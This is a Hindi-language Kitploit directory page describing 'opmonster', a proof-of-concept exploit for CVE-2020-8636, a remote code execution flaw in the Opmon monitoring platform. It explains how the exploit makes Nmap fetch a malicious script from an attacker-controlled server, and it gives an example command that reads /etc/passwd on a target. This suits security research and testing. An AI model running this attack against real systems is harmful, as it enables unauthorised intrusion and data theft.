Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
opmonster — CVE-2020-8636 प्रमाणित रिमोट कोड निष्पादन शोषण Opmon के लिए | Kitploit
उपकरण/GitHubGitHub/phor3nsic/opmonster
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubphor3nsic/opmonster

opmonster

CVE-2020-8636 प्रमाणित रिमोट कोड निष्पादन शोषण Opmon के लिए

रिपॉजिटरी देखें
283 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

OpMonster

CVE-2020-8636 — Opmon के लिए प्रमाणित रिमोट कोड निष्पादन शोषण

के बारे में • स्थापना • उपयोग • लाइसेंस

language last commit license stars

OpMonster

के बारे में

OpMonster CVE-2020-8636 के लिए एक साक्ष्य-अवधारणा शोषण है, जो Opmon निगरानी प्लेटफॉर्म में एक रिमोट कोड निष्पादन भेद्यता है। यह nettools.php एंडपॉइंट का दुरुपयोग करता है, जो आपको मनमाने --script विकल्पों के साथ Nmap चलाने देता है। शोषण Opmon को आपके नियंत्रण वाले सर्वर ( http-fetch के माध्यम से) से एक दुर्भावनापूर्ण .nse Nmap स्क्रिप्ट प्राप्त करने के लिए मजबूर करता है, इसे /tmp में ड्रॉप करता है, फिर लक्ष्य पर आपका कमांड निष्पादित करने और आउटपुट प्रिंट करने के लिए इसे चलाता है।

@phor3nsic द्वारा खोजा और विकसित किया गया। अधिक जानकारी: Opmon पर तीन CVE।

स्थापना

git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests

उपयोग

सबसे पहले, एक वेब सर्वर को ऐसे होस्ट पर शुरू करें जहाँ लक्ष्य पहुँच सके, ऐसी निर्देशिका में जहाँ से उत्पन्न .nse स्क्रिप्ट डाउनलोड की जा सके (शोषण स्क्रिप्ट को वर्तमान निर्देशिका में लिखता है):

php -S 0.0.0.0:1337

फिर चार स्थितीय तर्कों के साथ शोषण चलाएं:

python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"
तर्कविवरण
HOSTलक्ष्य Opmon आधार URL (उदा. https://vulnhost.com)
LHOSTआपका सर्वर होस्ट जो .nse स्क्रिप्ट प्रदान करता है
LPORTआपका सर्वर पोर्ट
CMDलक्ष्य पर निष्पादित करने के लिए कमांड

यदि लक्ष्य स्क्रिप्ट डाउनलोड नहीं करता ("कमजोर नहीं") या आपके सर्वर से बाहरी कनेक्शन नहीं बना सकता, तो शोषण एक संदेश के साथ रुक जाता है।

अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए। इसका उपयोग कैसे करें इसकी जिम्मेदारी आपकी है।

लाइसेंस

MIT © phor3nsic

टूल डाउनलोड करें